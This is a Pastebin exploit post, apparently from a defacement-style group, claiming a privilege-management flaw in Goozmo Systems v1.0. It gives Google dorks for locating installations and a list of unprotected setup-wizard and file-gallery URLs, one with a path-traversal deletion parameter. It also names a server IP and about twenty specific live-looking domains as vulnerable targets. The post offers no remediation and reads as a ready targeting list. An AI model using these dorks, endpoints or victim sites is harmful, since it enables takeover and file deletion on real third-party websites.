Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Goozmo™ Systems v.1.0 Improper Privilege Management
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : goozmo.com
- # Software Information Link : goozmo.com/about-goozmo/
- # Software Version : 1.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''Goozmo™ Systems - v.1.0''
- intext:©2000-2018 Goozmo™ Inc, All rights reserved.
- www.goozmo.com | Printed on Recycled Data™
- intext:© 2000 – 2019 Goozmo, Inc + Denver, Colorado Design,
- Strategy, Development, and Fun + Printed on Recycled Data™
- # Vulnerability Type : CWE-269 [ Improper Privilege Management ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010282
- ####################################################################
- # Description about Software :
- ***************************
- Goozmo Systems is the agency of web designers, web developers and fanatics of web apps.
- ####################################################################
- # Impact :
- ***********
- * The following versions of Goozmo™ Systems, a software management platform,
- are affected : Goozmo™ Systems v.1.0
- * This software Goozmo™ Systems v.1.0 does not properly assign, modify,
- track, or check privileges for an actor, creating an unintended sphere of control for that actor.
- * Successful exploitation of this vulnerability could allow authenticated
- system users to escalate their privileges under certain conditions.
- * Authenticated, non-administrative local users are able to alter service
- executables with escalated privileges which could allow an attacker to
- execute arbitrary code under the context of the current system services.
- Note : New installation of websites and one attacker has administrational authorization.
- Note : If you add a note to one website - all websites affects at the same time.
- ####################################################################
- # Privelege Escalation/Improper Privilege Management Exploit :
- ******************************************************
- /goowizard/step_one.php
- /goowizard/step_two.php
- /goowizard/step_three.php
- /goowizard/step_four.php
- /goowizard/step_five.php
- /goopages/pages_downloadgallery/addfile.php
- /goopages/pages_downloadgallery/index.php
- /goopages/pages_downloadgallery/addfile.php?edit=1&id=[ID-NUMBER]&galleryid=1
- /file_archive/file_archive.php?user_id=&site_id=&file_spot=imgthree
- /goopages/pages_downloadgallery/deletefile.php?id=[ID-NUMBER]&filename=[FILENAME]&image=../../../[FILENAME]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- Note : Vulnerable IP Address => (104.196.11.136)
- There are 191 domains hosted on this server.
- [+] 10170orchidreserve.com/goopages/pages_downloadgallery/index.php =>
- [ Proof of Concept ] => archive.is/DQUj9
- [+] synergisticbuildingtechnologies.com/goowizard/step_one.php
- [+] springerscustomcycles.com/goowizard/step_two.php
- [+] artworkspottery.com/goowizard/step_three.php
- [+] architecturalpartnership.com/goowizard/step_four.php
- [+] anaturalbliss.com/goowizard/step_five.php
- [+] 7480marshcove.com/goopages/pages_downloadgallery/addfile.php
- [+] 6441riverpointeway.com/goopages/pages_downloadgallery/addfile.php
- [+] threeiguanasbelize.com/goopages/pages_downloadgallery/addfile.php
- [+] 2175ibisisleroad.com/goopages/pages_downloadgallery/addfile.php
- [+] 2128milanocourt.com/goopages/pages_downloadgallery/addfile.php
- [+] 13401oakmeade.com/goopages/pages_downloadgallery/addfile.php
- [+] 13361marshlanding.com/goopages/pages_downloadgallery/addfile.php
- [+] 13201marshlanding.com/goopages/pages_downloadgallery/addfile.php
- [+] 13181oakmeade.com/goopages/pages_downloadgallery/addfile.php
- [+] 13081sabalchase.com/goopages/pages_downloadgallery/addfile.php
- [+] 13061sabalchase.com/goopages/pages_downloadgallery/addfile.php
- [+] 13001brynwood.com/goopages/pages_downloadgallery/addfile.php
- [+] 12981brynwood.com/goopages/pages_downloadgallery/addfile.php
- [+] caninecampovers.com/goopages/pages_downloadgallery/addfile.php
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement